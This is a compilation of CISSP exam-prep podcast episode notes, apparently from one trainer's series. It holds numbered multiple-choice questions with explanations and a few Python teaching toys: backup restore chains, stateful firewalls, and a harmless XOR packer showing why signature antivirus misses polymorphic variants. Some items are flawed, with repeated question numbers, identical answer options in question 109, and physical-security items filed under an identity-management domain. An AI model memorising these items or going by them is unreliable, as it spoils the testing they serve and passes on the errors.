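        diff_positions = [i for i, b in enumerate(after_full) if b.kind == "differential"]
        start = 0
        if diff_positions:
            needed.append(after_full[diff_positions[-1]])
            start = diff_positions[-1] + 1
        needed.extend(b for b in after_full[start:] if b.kind == "incremental")
        return needed


def scenario(strategy: str) -> BackupSimulation:
    """Constructed scenario: three files, a full backup on day 0, then one
    file changed per day with a backup of `strategy` each evening."""
    sim = BackupSimulation()
    for path in ("payroll.db", "ledger.csv", "config.yaml"):
        sim.modify(path, day=0)
    sim.run("full", day=0)
    sim.modify("payroll.db", day=1)
    sim.run(strategy, day=1)
    sim.modify("ledger.csv", day=2)
    sim.run(strategy, day=2)
    return sim


if __name__ == "__main__":
    for strategy in ("incremental", "differential"):
        sim = scenario(strategy)
        for b in sim.history:
            print(f"{strategy:12s} day {b.day} {b.kind:12s} captured {b.files}")
        print(f"{strategy:12s} restore needs {len(sim.restore_set())} backup sets\n")
```

The trade-off the exam expects: incrementals are smallest and fastest to take but the restore chain grows with every run (and a single missing set breaks it), while differentials grow larger each day but a restore never needs more than the full plus the latest differential.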
In this episode, Shon will provide CISSP training for Domain 7 (Security Operations) of the CISSP Exam.

CISSP Exam Questions

Question: 116 What is the highest potential risk of keeping log files from computer and network devices within your environment?
A) Subject to legal discovery
B) Consume large amounts of storage
C) Continuously increasing storage costs
D) None of the above

Explanation: [a] All of the above are reasons not to keep log files too long in your environment, but the highest risk to your organization is the exposure to legal discovery.

------------------------------------

Question: 117 Organizations focused on the concept of "least privilege" focus on which of the following?
A) Only a few have the most network access within a company
B) Only decision makers have the necessary access needed within the company
C) Each person only needs access based on role/requirements
D) Most senior individuals within the company have the majority of the access

Explanation: [c] Each person should only have the access needed for their role/position. Typically, employees' access increases over time as access is granted but rarely removed, which is why periodic access reviews are needed to keep privilege at the minimum.

------------------------------------

Question: 118 Compact Discs (CD) and Digital Versatile Discs (DVD) do not degrade over time and are considered safe for long-term storage of data.
A) True
B) False

Explanation: [b] CDs / DVDs will degrade over time and should not be considered good storage media for data over long periods of time.
In this episode, Shon will provide CISSP training for Domain 7 (Security Operations) of the CISSP Exam.

CISSP Exam Questions

Question: 113 When conducting an incident investigation within an organization, what are some key items to keep in mind before starting?
A) Assemble a team with the best skillsets to meet the objectives
B) Operate under your Incident Response Process
C) Define specific Rules of Engagement (ROEs) around Law Enforcement, Interviewing Employees, etc.
D) All of the above

Explanation: [d] All of the above should be considered when conducting an investigation of an incident within your organization.

------------------------------------

Question: 114 What are the three options used for gathering evidence for an investigation?
A) Voluntary Surrender, Subpoena, Search Warrant
B) Involuntary Surrender, Subpoena, Search Warrant
C) Voluntary Surrender, Search and Seizure, Warrant
D) Involuntary Surrender, Search and Seizure, Warrant

Explanation: [a] When gathering evidence there are three legal options available to gain access to evidence: Voluntary Surrender, Subpoena, and a Search Warrant.

------------------------------------

Question: 115 Which of the following steps will not be included within the change management process?
A) Immediate change, if leadership wants the change to occur
B) A change request
C) Rollback plan for the change
D) Documenting the change

Explanation: [a] There are situations where emergency changes need to occur, but it should be a genuine emergency, handled through the emergency change procedure, and not the desire of an individual to just make the change.

LINKS:
Online Article https://www.dflabs.com/blog/9-key-components-of-incident-and-forensics-management/
In this episode, Shon will provide CISSP training for Domain 6 (Security Assessment and Testing) of the CISSP Exam.

CISSP Exam Questions

Question: 110 Tom would like to test systems that lie within his network for vulnerabilities that could be exploited by the most recent set of ransomware variants. Which one of the following tools would be best suited to accomplish this task?
A) Network discovery scanner
B) Network vulnerability scanner
C) Web vulnerability scanner
D) Ping sweep

Explanation: [b] A network vulnerability scanner would be the best tool for discovering what vulnerabilities reside within your network. A discovery scanner or ping sweep only tells you which hosts and ports are live, not whether they are vulnerable.

------------------------------------

Question: 111 When trying to gain the most detailed information about a system from a scan, what is the best scan to meet that objective?
A) Port Scan
B) Authenticated Scan
C) Vulnerability Scan
D) Unauthenticated Scan

Explanation: [b] An authenticated scan lets the scanner log in with credentials, which provides the most detailed information (installed packages, patch levels, configuration). An unauthenticated scan only provides the view that is available from the outside and may not be an adequate or fair assessment of the system.

------------------------------------

Question: 112 What is the most common port used to communicate encrypted traffic on a web server?
A) 22
B) 143
C) 80
D) 443

Explanation: [d] 443 is the standard port for HTTPS, where web traffic is encrypted with TLS. Any port can be used for encrypted data, but 443 is the common standard.
In this episode, Shon will provide CISSP training for Domain 6 (Security Assessment and Testing) of the CISSP Exam.

CISSP Exam Questions

Question: 108 What are the various phases associated with completing a Penetration Test for an organization?
A) Planning, Reporting, Vulnerability Management, Exploiting, Information Gathering
B) Production, Registration, Vulnerability Management, Exploiting, Information Gathering
C) Planning, Reporting, Vulnerability Scanning, Exploiting, Information Gathering
D) Production, Reporting, Vulnerability Management, Exploiting, Information Gathering

Explanation: [c] Planning, Information Gathering, Vulnerability Scanning, Exploiting, and Reporting are the phases of completing a penetration test for an organization (the answer choice lists them out of order).

------------------------------------

Question: 109 When creating metrics for your leadership, which items should you focus on first, and how complex should the report be?
A) Very complex metrics focused on all systems; Open vulnerabilities, Time to resolve, Outdated systems, Uploaded data, Legal/Compliance Issues
B) Very simple metrics focused on critical systems; Open vulnerabilities, Time to resolve, Outdated systems, Uploaded data, Legal/Compliance Issues
C) Very simple metrics focused on critical systems; Management processes, Closed vulnerabilities, Time to resolve, Outdated systems, Uploaded data, Legal/Compliance issues
D) Very simple metrics focused on critical systems; Open vulnerabilities, Time to resolve, Outdated systems, Uploaded data, Legal/Compliance Issues

Explanation: [b] Starting with simple metrics focused on critical systems (Open vulnerabilities, Time to resolve, Outdated systems, Uploaded data, Legal/Compliance Issues) is the best method to get started. Obviously, your organization may be different and you will have to modify these to meet your needs, but it is a good place to start: keep it simple.

------------------------------------

Question: 110 When completing a Penetration Test of your organization, who needs to be involved in the discussion and decision?
A) No one; informing people that the penetration test will occur will taint the results, resulting in waste
B) Everyone; it is important that people don't feel duped that this test was designed to trick them
C) Key personnel; it is important to focus on only telling the decision makers/influencers (CEO/CIO, Legal, Public Affairs, Compliance) as it relates to a penetration test
D) None of the above

Explanation: [c] It is important that the right people are involved in the decision-making process, as a Pen Test can have significant impact on an organization and cause a disruption within a company.
In this episode, Shon will provide CISSP training for Domain 6 (Security Assessment and Testing) of the CISSP Exam. CISSP Article – RAYGUN - SDLC: 7 phases, popular models, benefits, and more. CISSP Training – Integrate Security in the Software Development Life Cycle (SDLC).

CISSP Exam Questions

Question: 105
What tool is commonly used as a scan engine to find vulnerabilities within an environment?
A) Nessus
B) NMAP
C) Ping
D) DNS
Explanation: [a] Nessus is a vulnerability scanner commonly used to look for vulnerabilities within a network and determine whether an exploit could be used against a system. NMAP is primarily a port and service discovery tool; ping and DNS are not scanners.
------------------------------------
Question: 106
What are the typical components of a security assessment program within an organization?
A) Tests, Assessments, and Audits
B) Tests, Audits, and Reviews
C) Assessments, Access Reviews, Tests
D) None of the above
Explanation: [a] Tests, assessments and audits are the main components of a security assessment program for an organization.
------------------------------------
Question: 107
Which one of the items below is not normally included as part of a security assessment?
A) Risk assessments
B) Vulnerability mitigation strategies
C) Threat assessments
D) Vulnerability scan
Explanation: [b] Vulnerability mitigation strategies are not typically included in the overall security assessment, because the mitigation and/or acceptance of risk is highly dependent on the organization.
In this episode, Shon will provide CISSP training for Domain 5 (Identity and Access Management) of the CISSP Exam.

CISSP Exam Questions

Question: 102
If you want to restrict access into or out of a facility, which would you choose?
A) Gate
B) Turnstile
C) Fence
D) Mantrap
Answer: [b] Turnstile. A turnstile is a form of gate that prevents more than one person from gaining entry at a time and often restricts movement to one direction. It is used to gain entry but not exit, or vice versa.
From
------------------------------------
Question: 103
Which of the following is not a disadvantage of using security guards?
A) Security guards are usually unaware of the scope of the operations within a facility.
B) Not all environments and facilities support security guards.
C) Not all security guards are themselves reliable.
D) Prescreening, bonding, and training does not guarantee effective and reliable security guards.
Answer: [a] Security guards are usually unaware of the scope of the operations within a facility, which supports the confidentiality of those operations and thus helps reduce the possibility that a security guard will be involved in the disclosure of confidential information.
From
------------------------------------
Question: 104
What type of motion detector senses changes in the electrical or magnetic field surrounding a monitored object?
A) Wave
B) Photoelectric
C) Heat
D) Capacitance
Answer: [d] Capacitance. A capacitance motion detector senses changes in the electrical or magnetic field surrounding a monitored object.
From
In this episode, Shon will provide CISSP training for Domain 5 (Identity and Access Management) of the CISSP Exam.

CISSP Exam Questions

Question: 099
What is the ideal humidity range for a computer room?
A) 20-40 percent
B) 40-60 percent
C) 60-75 percent
D) 80-95 percent
Answer: [b] The humidity in a computer room should ideally be from 40 to 60 percent. Lower humidity raises the risk of static discharge; higher humidity leads to condensation and corrosion.
From
------------------------------------
Question: 100
A Type B fire extinguisher may use all except which of the following suppression mediums?
A) Water
B) CO2
C) Halon or an acceptable halon substitute
D) Soda acid
Answer: [a] Water is never the suppression medium in Type B fire extinguishers because they are used on liquid fires, which water would spread rather than smother.
From
------------------------------------
Question: 101
Which of the following is not a disadvantage of using security guards?
A) Security guards are usually unaware of the scope of the operations within a facility.
B) Not all environments and facilities support security guards.
C) Not all security guards are themselves reliable.
D) Prescreening, bonding, and training does not guarantee effective and reliable security guards.
Answer: [a] Security guards are usually unaware of the scope of the operations within a facility; this supports the confidentiality of those operations and is an advantage rather than a disadvantage.
From
In this episode, Shon will provide CISSP training for Domain 5 (Identity and Access Management) of the CISSP Exam.

CISSP Exam Questions

Question: 096
At what voltage level can static electricity cause destruction of data stored on hard drives?
A) 4,000
B) 17,000
C) 40
D) 1,500
Answer: [d] Destruction of data stored on hard drives can be caused by 1,500 volts of static electricity.
From https://www.brainscape.com/flashcards/physical-environmental-security-1004067/packs/1774328
------------------------------------
Question: 097
What type of physical security controls focus on facility construction and selection, site management, personnel controls, awareness training, and emergency response and procedures?
A) Technical
B) Physical
C) Administrative
D) Logical
Answer: [c] Administrative physical security controls include facility construction and selection, site management, personnel controls, awareness training, and emergency response and procedures.
From https://www.brainscape.com/flashcards/physical-environmental-security-1004067/packs/1774328
------------------------------------
Question: 098
Which of the following is typically not a culprit in causing damage to computer equipment in the event of a fire and a triggered suppression?
A) Heat
B) Suppression medium
C) Smoke
D) Light
Answer: [d] Light is usually not damaging to most computer equipment, but heat, smoke, and the suppression medium (typically water) are very destructive.
From https://www.brainscape.com/flashcards/physical-environmental-security-1004067/packs/1774328

Online Article https://www.hidglobal.com/blog/multi-factor-authentication-and-single-sign-explained
In this episode, Shon will provide CISSP training for Domain 4 (Communication and Network Security) of the CISSP Exam.

CISSP Exam Questions

Question: 093
________ is a standards-based mechanism for providing encryption for point-to-point TCP/IP traffic.
A) UDP
B) IDEA
C) IPSec
D) SDLC
Answer: [c] IPSec, or IP Security, is a standards-based mechanism for providing encryption (ESP) and integrity/authentication (AH and ESP) for point-to-point TCP/IP traffic at the network layer. UDP is a transport protocol, IDEA is a block cipher, and SDLC here is Synchronous Data Link Control, a data-link protocol.
From https://www.brainscape.com/flashcards/telecommunications-and-network-security-971259/packs/1774328
------------------------------------
Question: 094
What is both a benefit and a potentially harmful implication of multilayer protocols?
A) Throughput
B) Encapsulation
C) Hash integrity checking
D) Logical addressing
Answer: [b] Encapsulation is both a benefit and a potentially harmful implication of multilayer protocols: it lets any protocol be carried inside another, which is also how covert channels and filter bypasses are built.
From https://www.brainscape.com/flashcards/telecommunications-and-network-security-971259/packs/1774328
------------------------------------
Question: 095
Which of the following is not true regarding firewalls?
A) They are able to log traffic information.
B) They are able to block viruses.
C) They are able to issue alarms based on suspected attacks.
D) They are unable to prevent internal attacks.
Answer: [b] Most firewalls offer extensive logging, auditing, and monitoring capabilities as well as alarms and even basic IDS functions. Firewalls are unable to block viruses or malicious code transmitted through otherwise authorized communication channels, prevent unauthorized but accidental or intentional disclosure of information by users, prevent attacks by malicious users already behind the firewall, or protect data after it has passed out of or into the private network.
From https://www.brainscape.com/flashcards/telecommunications-and-network-security-971259/packs/1774328
In this episode, Shon will provide CISSP training for Domain 4 (Communication and Network Security) of the CISSP Exam.

CISSP Exam Questions

Question: 090
Which type of firewall automatically adjusts its filtering rules based on the content of the traffic of existing sessions?
A) Static packet filtering
B) Application-level gateway
C) Stateful inspection
D) Dynamic packet filtering
Answer: [d] Dynamic packet-filtering firewalls enable the real-time modification of the filtering rules based on traffic content, for example opening a return path for a session an internal host has just started.
From https://www.brainscape.com/flashcards/telecommunications-and-network-security-971259/packs/1774328
------------------------------------
Question: 091
Which type of firewall examines the source and destination addresses, the application usage, the source of origin, and the relationship between current packets and previous packets of the same session, and so can grant a broader range of access for authorized users and activities while actively watching for and blocking unauthorized users and activities?
A) Static packet-filtering
B) Application-level gateway
C) Stateful inspection
D) Circuit-level gateway
Answer: [c] Stateful inspection firewalls keep a table of active sessions and evaluate each packet in the context of its session, which is what lets them grant a broader range of access for authorized users and activities and actively watch for and block unauthorized users and activities.
From https://www.brainscape.com/flashcards/telecommunications-and-network-security-971259/packs/1774328
------------------------------------
Question: 092
Which of the following can be used to bypass even the best physical and logical security mechanisms to gain access to a system?
A) Brute-force attacks
B) Denial of service
C) Social engineering
D) Port scanning
Answer: [c] Social engineering can often be used to bypass even the most effective physical and logical controls. Whatever activity the attacker convinces the victim to perform, it is usually directed toward opening a back door that the attacker can use to gain access to the network.
From https://www.brainscape.com/flashcards/telecommunications-and-network-security-971259/packs/1774328
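The difference questions 090 and 091 turn on is easiest to see in code. The following is an added example, not code from the episode or from the ISC2 material: a static packet filter that decides on header fields alone is placed beside a toy stateful-inspection filter that remembers which sessions internal hosts opened. The internal prefix, the addresses and the packet sequence are all constructed for the demonstration.

```python
from dataclasses import dataclass

INTERNAL_NET = "10.0.0."   # assumed internal address prefix (constructed)


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: str   # "SYN", "SYN-ACK", "ACK" or "FIN" (TCP only, for brevity)


def is_internal(ip: str) -> bool:
    return ip.startswith(INTERNAL_NET)


def static_filter(pkt: Packet) -> bool:
    """Static packet filter: the decision uses header fields of this packet
    only. Rule: allow traffic to or from TCP port 443, drop everything else.
    Because replies come from port 443, a rule that admits them also admits
    any unsolicited packet an attacker sends from source port 443."""
    return pkt.dport == 443 or pkt.sport == 443


class StatefulFirewall:
    """Stateful inspection: remembers sessions that internal hosts opened and
    admits inbound packets only when they belong to one of those sessions.
    The session table is the kind of rule a dynamic packet filter adds on
    the fly and removes when the session ends."""

    def __init__(self) -> None:
        self.sessions: set = set()   # (int_ip, int_port, ext_ip, ext_port)

    def filter(self, pkt: Packet) -> bool:
        if is_internal(pkt.src) and not is_internal(pkt.dst):
            key = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
            if pkt.flags == "SYN":
                self.sessions.add(key)   # outbound connection attempt: record it
                return True
            return key in self.sessions
        if is_internal(pkt.dst) and not is_internal(pkt.src):
            key = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
            if key in self.sessions:
                if pkt.flags == "FIN":
                    self.sessions.discard(key)   # session torn down: forget it
                return True
            return False   # unsolicited inbound packet: no session, drop
        return False   # internal<->internal or external<->external: not our job


def run_scenario() -> dict:
    """Constructed packet sequence: an internal client opens an HTTPS session,
    the server replies, then a third party forges a reply from port 443."""
    fw = StatefulFirewall()
    out_syn = Packet("10.0.0.5", 51000, "203.0.113.9", 443, "SYN")
    reply = Packet("203.0.113.9", 443, "10.0.0.5", 51000, "SYN-ACK")
    rogue = Packet("198.51.100.7", 443, "10.0.0.5", 51000, "SYN-ACK")
    return {
        "static_reply": static_filter(reply),     # True
        "static_rogue": static_filter(rogue),     # True: source port 443 is enough
        "stateful_syn": fw.filter(out_syn),       # True: session recorded
        "stateful_reply": fw.filter(reply),       # True: matches the session
        "stateful_rogue": fw.filter(rogue),       # False: no session for this peer
    }
```

The static filter has no choice but to pass the forged reply, because a rule that lets legitimate HTTPS replies in is a rule about port numbers, not about who asked for them. The stateful filter passes the real reply and drops the forged one with the same amount of configuration; what it gains is a session table that has to be protected from exhaustion and aged out correctly, which is where real implementations spend most of their complexity.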
In this episode, Shon will provide CISSP training for Domain 3 (Engineering Secure Design) of the CISSP Exam.

CISSP Exam Questions

Question: 084
What is the most commonly used technique to protect against virus attacks?
A) Signature detection
B) Heuristic detection
C) Data integrity assurance
D) Automated reconstruction
Answer: [a] Signature detection mechanisms use known descriptions (byte patterns or hashes) of viruses to identify malicious code resident on a system. The trade-off is that a variant whose bytes differ from the stored signature is missed until the signature database is updated.
Source: https://www.brainscape.com/flashcards/security-architecture-and-design-983876/packs/1774328
------------------------------------
Question: 085
In which of the following security modes can you be assured that all users have access permissions for all information processed by the system but will not necessarily need to know all of that information?
A) Dedicated
B) System high
C) Compartmented
D) Multilevel
Answer: [b] In system high mode, all users have appropriate clearances and access permissions for all information processed by the system but need to know only some of the information processed by that system.
Source: https://www.brainscape.com/flashcards/security-architecture-and-design-983876/packs/1774328
------------------------------------
Question: 086
What is a trusted computing base (TCB)?
A) Hosts on your network that support secure transmissions
B) The operating system kernel and device drivers
C) The combination of hardware, software, and controls that work together to enforce a security policy
D) The software and controls that certify a security policy
Answer: [c] The TCB is the combination of hardware, software, and controls that work together to enforce a security policy. The kernel and device drivers are part of it, but so is every other component the enforcement of the policy depends on.
Source: https://www.brainscape.com/flashcards/security-architecture-and-design-983876/packs/1774328
In this episode, Shon will provide CISSP training for Domain 3 (Engineering Secure Design) of the CISSP Exam.

CISSP Exam Questions

Question: 081
Which one of the following storage devices is most likely to require encryption technology in order to maintain data security in a networked environment?
A) Hard disk
B) Backup tape
C) Removable drives
D) RAM
Answer: [c] Removable drives are easily taken out of their authorized physical location, and it is often not possible to apply operating system access controls to them. Therefore, encryption is often the only security measure short of physical security that can be afforded to them. Backup tapes are most often well controlled through physical security measures. Hard disks and RAM chips are often secured through operating system access controls.
Source: https://www.brainscape.com/flashcards/security-architecture-and-design-983876/packs/1774328
------------------------------------
Question: 082
What advanced virus technique modifies the malicious code of a virus on each system it infects?
A) Polymorphism
B) Stealth
C) Encryption
D) Multipartitism
Answer: [a] In an attempt to avoid detection by signature-based antivirus software packages, polymorphic viruses modify their own code each time they infect a system, so no two copies share the same byte pattern.
Source: https://www.brainscape.com/flashcards/security-architecture-and-design-983876/packs/1774328
------------------------------------
Question: 083
Which one of the following types of memory might retain information after being removed from a computer and, therefore, represent a security risk?
A) Static RAM
B) Dynamic RAM
C) Secondary memory
D) Real memory
Answer: [c] Secondary memory is a term used to describe magnetic and optical media. These devices will retain their contents after being removed from the computer and may later be read by another user.
Source: https://www.brainscape.com/flashcards/security-architecture-and-design-983876/packs/1774328
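Questions 082 here and 084 in the previous episode are two halves of the same point: a signature matches bytes, and polymorphism changes the bytes. The following is an added example, not code from the episode or from any antivirus product. The "malware" is a harmless marker string, the signature set and the XOR-based decoder stub are constructed toys, and the heuristic engine is a stand-in for what real products do with emulation.

```python
# Signature "database": one byte pattern taken from a known sample. The marker
# is a harmless constructed string, not a real malware signature.
SIGNATURES = {"SAMPLE-1": b"KNOWN-BAD-MARKER"}


def signature_scan(blob: bytes) -> list:
    """Signature detection: report every known pattern present in the bytes."""
    return [name for name, pattern in SIGNATURES.items() if pattern in blob]


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def make_polymorphic_variant(body: bytes, key: int) -> bytes:
    """Toy polymorphic packing: XOR-encode the body with a per-infection key
    and prepend a 'decoder stub' that carries the key. Each key yields a
    byte-for-byte different file even though the decoded payload is identical."""
    if not 1 <= key <= 255:
        raise ValueError("key must be a non-zero byte")   # key 0 changes nothing
    return b"STUB" + bytes([key]) + xor_bytes(body, key)


def unpack_variant(variant: bytes) -> bytes:
    """What the decoder stub does at run time."""
    if not variant.startswith(b"STUB"):
        raise ValueError("not a packed variant")
    return xor_bytes(variant[5:], variant[4])


def heuristic_scan(blob: bytes) -> list:
    """Emulates the heuristic approach: recognise the decoder stub, run the
    decoding step in a sandbox, then apply the signatures to the result."""
    if blob.startswith(b"STUB"):
        return signature_scan(unpack_variant(blob))
    return signature_scan(blob)


def demo(key: int = 0x5A) -> dict:
    """Scan the original sample and one polymorphic variant with both engines."""
    original = b"...benign padding..." + SIGNATURES["SAMPLE-1"] + b"...more..."
    variant = make_polymorphic_variant(original, key)
    return {
        "original_by_signature": signature_scan(original),   # ['SAMPLE-1']
        "variant_by_signature": signature_scan(variant),     # []  (bytes differ)
        "variant_by_heuristic": heuristic_scan(variant),     # ['SAMPLE-1']
        "roundtrip_ok": unpack_variant(variant) == original,
    }
```

The signature engine catches the original and misses every variant, which is exactly why signature detection is the most common technique and also why it is never the only one. The heuristic engine recovers the match by recognising the decoder and scanning what it produces; real polymorphic engines rewrite the decoder itself on each infection, which is why the detection problem is harder than this toy suggests.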
In this episode, Shon will provide CISSP training for Domain 3 (Engineering Secure Design) of the CISSP Exam.

CISSP Exam Questions

Question: 078
Which database security risk occurs when data from a higher classification level is mixed with data from a lower classification level?
A) Aggregation
B) Inference
C) Contamination
D) Polyinstantiation
Answer: [c] Contamination is the mixing of data from a higher classification level and/or need-to-know requirement with data from a lower classification level and/or need-to-know requirement.
Source: https://www.brainscape.com/flashcards/security-architecture-and-design-983876/packs/1774328
------------------------------------
Question: 079
How many major categories do the TCSEC criteria define?
A) Two
B) Three
C) Four
D) Five
Answer: [c] TCSEC defines four major categories: category A is verified protection, category B is mandatory protection, category C is discretionary protection, and category D is minimal protection.
Source: https://www.brainscape.com/flashcards/security-architecture-and-design-983876/packs/1774328
------------------------------------
Question: 080
Which Bell-LaPadula property keeps lower-level subjects from accessing objects with a higher security level?
A) (star) Security Property
B) No write up property
C) No read up property
D) No read down property
Answer: [c] The no-read-up rule, also called the simple security property, prohibits a subject from reading an object at a higher security level. The *-property (option A) is the complementary no-write-down rule, which stops a high-level subject from writing to a lower-level object.
Source: https://www.brainscape.com/flashcards/security-architecture-and-design-983876/packs/1774328

Online Article https://thorteaches.com/what-is-the-best-way-to-study-for-the-cissp-certification/
In this episode, Shon will talk about questions for Domain 2 (Asset Security) of the CISSP Exam.

CISSP Exam Questions

Question: 075
As head of sales, Jim is the data owner for the sales department. Which of the following is not Jim's responsibility as data owner?
A) Assigning information classifications
B) Dictating how data should be protected
C) Verifying the availability of data
D) Determining how long to retain data
Answer: [c] Verifying the availability of data is the only responsibility listed that does not belong to the data (information) owner. Rather, it is the responsibility of the data (information) custodian. The data custodian is also responsible for maintaining and protecting data as dictated by the data owner. This includes performing regular backups of data, restoring data from backup media, retaining records of activity, and fulfilling information security and data protection requirements in the company's policies, guidelines, and standards. Data owners work at a higher level than the data custodians. The data owners basically state, "This is the level of integrity, availability, and confidentiality that needs to be provided; now go do it." The data custodian must then carry out these mandates and follow up with the installed controls to make sure they are working properly.
From
------------------------------------
Question: 076
Assigning data classification levels can help with all of the following except:
A) The grouping of classified information with hierarchical and restrictive security
B) Ensuring that nonsensitive data is not being protected by unnecessary controls
C) Extracting data from a database
D) Lowering the costs of protecting data
Answer: [c] Data classification does not involve the extraction of data from a database. However, data classification can be used to dictate who has access to read and write data that is stored in a database. Each classification should have separate handling requirements and procedures pertaining to how that data is accessed, used, and destroyed. For example, in a corporation, confidential information may only be accessed by senior management. Auditing could be very detailed and its results monitored daily, and degaussing or overwriting procedures may be required to erase the data. On the other hand, information classified as public may be accessed by all employees, with no special auditing or destruction methods required.
From
------------------------------------
Question: 077
Susan, an attorney, has been hired to fill a new position at Widgets, Inc.: chief privacy officer (CPO). What is the primary function of her new role?
A) Ensuring the protection of partner data
B) Ensuring the accuracy and protection of company financial information
C) Ensuring that security policies are defined and enforced
D) Ensuring the protection of customer, company, and employee data
Answer: [d] The chief privacy officer (CPO) position is being created by companies in response to the increasing demands on organizations to protect myriad types of data. The CPO is responsible for ensuring the security of customer, company, and employee data, which keeps the company free from legal prosecution and, hopefully, out of the headlines. Thus, the CPO is directly involved with setting policies on how data is collected, protected, and distributed to third parties. The CPO is usually an attorney and reports to the chief security officer (CSO).
From
In this episode, Shon will talk about questions for Domain 2 (Asset Security) of the CISSP Exam.

CISSP Exam Questions

Question: 072
Jared plays a role in his company's data classification system. In this role, he must practice due care when accessing data and ensure that the data is used only in accordance with allowed policy while abiding by the rules set for the classification of the data. He does not determine, maintain, or evaluate controls, so what is Jared's role?
A) Data owner
B) Data custodian
C) Data user
D) Information systems auditor
Answer: [c] Any individual who uses data for work-related tasks is a data user. Users must have the necessary level of access to the data to perform the duties within their position and are responsible for following operational security procedures to ensure the data's confidentiality, integrity, and availability to others. This means that users must practice due care and act in accordance with both security policy and data classification rules.
From
In this episode, Shon will talk about the following items that are included within Domain 2 (Asset Security) of the CISSP Exam. CISSP Article – Best Practices for Data Management. CISSP Training – Determine and maintain information and asset ownership. CISSP Exam Questions.

CISSP Exam Questions

Question: 069
You work as an IT professional for a defense contractor that handles classified military information. Which one of the following data classifications applies to information that could be expected to cause serious damage to national security if disclosed in an unauthorized fashion?
A) SBU
B) Top Secret
C) Secret
D) Confidential
Answer: [c] Secret classification is applied to information the unauthorized disclosure of which reasonably could be expected to cause serious damage to the national security. Top Secret classification is "applied to information, the unauthorized disclosure of which reasonably could be expected to cause exceptionally grave damage to the national security." Confidential classification is "applied to information, the unauthorized disclosure of which reasonably could be expected to cause damage to the national security." Sensitive But Unclassified (SBU) information is protected information that does not reach the threshold for classified information.
From
------------------------------------
Question: 070
You are using symmetric encryption to protect data stored on a hard drive that will be shipped across the country. What key(s) are involved in the protection of this information?
A) Shared secret
B) Public key
C) Public and private keys
D) Private key
Answer: [a] Symmetric encryption uses a single shared secret key for both encryption and decryption; the sender and the recipient must both hold it, and the problem becomes getting it to the recipient without shipping it alongside the drive. Public keys are used to encrypt information intended for a specific recipient in asymmetric cryptography. They are not used in symmetric cryptography. Private keys are used to decrypt information in asymmetric cryptography. They are not used in symmetric cryptography. Public and private key pairs are used in asymmetric cryptography. They are not used in symmetric cryptography.
From
------------------------------------
Question: 071
Which one of the following is NOT a European Union data handling principle required for participation in the Safe Harbor program?
A) Onward Transfer
B) Choice
C) Encryption
D) Notice
Answer: [c] Encryption is a control, not one of the Safe Harbor principles. The Notice principle states that organizations must inform individuals about the purpose and scope of data collection efforts. The Choice principle states that organizations must offer individuals the ability to opt out of information collection and storage programs. The Onward Transfer principle states that organizations must only share information with other organizations that comply with the data privacy directive. (The US-EU Safe Harbor framework itself was invalidated by the Court of Justice of the EU in 2015, but its principles still appear in exam material.)
From
------------------------------------

Online Article https://www.simplilearn.com/asset-security-tutorial-video
CISSP Exam Questions https://www.techveze.com/cissp-asset-security/
Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career. Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.

In this episode, Shon will talk about questions for Domain 1 (Security and Risk Management) of the CISSP Exam.

BTW - Get access to all my CISSP Training Courses here at: https://shongerber.com/

CISSP Exam Questions

Question: 066
Which of the following would generally not be considered an asset in a risk analysis?
A) A development process
B) An IT infrastructure
C) A proprietary system resource
D) Users' personal files

Answer: [D] Users' personal files - The personal files of users are not usually considered assets of the organization and thus are not considered in a risk analysis.

------------------------------------

Question: 067
You've performed a basic quantitative risk analysis on a specific threat/vulnerability/risk relation. You select a possible countermeasure. When performing the calculations again, which of the following factors will change?
A) Exposure factor
B) Single loss expectancy
C) Asset value
D) Annualized rate of occurrence

Answer: [D] Annualized rate of occurrence - A countermeasure directly affects the annualized rate of occurrence, primarily because the countermeasure is designed to prevent the occurrence of the risk, thus reducing its frequency per year.

------------------------------------

Question: 068
What ensures that the subject of an activity or event cannot deny that the event occurred?
A) CIA Triad
B) Abstraction
C) Nonrepudiation
D) Hash totals

Answer: [C] Nonrepudiation - Nonrepudiation ensures that the subject of an activity or event cannot deny that the event occurred.

------------------------------------

Want to find Shon elsewhere on the internet?
LinkedIn – www.linkedin.com/in/shongerber
Facebook - https://www.facebook.com/CyberRiskReduced/

LINKS:
ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources
Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career. Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.

In this episode, Shon will talk about questions for Domain 1 (Security and Risk Management) of the CISSP Exam.

BTW - Get access to all my CISSP Training Courses here at: https://shongerber.com/

CISSP Exam Questions

Question: 063
When seeking to hire new employees, what is the first step?
A) Create a job description.
B) Set position classification.
C) Screen candidates.
D) Request resumes.

Answer: [A] Create a job description. The first step in hiring new employees is to create a job description. Without a job description, there is no consensus on what type of individual needs to be found and hired.

------------------------------------

Question: 064
Which of the following describes the freedom from being observed, monitored, or examined without consent or knowledge?
A) Integrity
B) Privacy
C) Authentication
D) Accountability

Answer: [B] Privacy - One definition of privacy is freedom from being observed, monitored, or examined without consent or knowledge.

------------------------------------

Question: 065
Which of the following is typically not a characteristic considered when classifying data?
A) Value
B) Size of object
C) Useful lifetime
D) National security implications

Answer: [B] Size of object - Size is not a criterion for establishing data classification. When classifying an object, you should take value, lifetime, and security implications into consideration.

------------------------------------

Want to find Shon elsewhere on the internet?
LinkedIn – www.linkedin.com/in/shongerber
Facebook - https://www.facebook.com/CyberRiskReduced/

LINKS:
ISC2 Training Study Guide https://www.isc2.org/Training/Self-Study-Resources
Description: Shon Gerber from ShonGerber.com provides you the information and knowledge you need to prepare and pass the CISSP Exam while providing the tools you need to enhance your cybersecurity career. Shon utilizes his expansive knowledge while providing superior training from his years of training people in cybersecurity.

In this episode, Shon will talk about the following items that are included within Domain 1 (Security and Risk Management) of the CISSP Exam.

CISSP Article – Threat Modeling
CISSP Training – Data Integrity and Threat Modeling
CISSP Exam Questions

BTW - Get access to all my CISSP Training Courses here at: https://shongerber.com/

CISSP Exam Questions

Question: 060
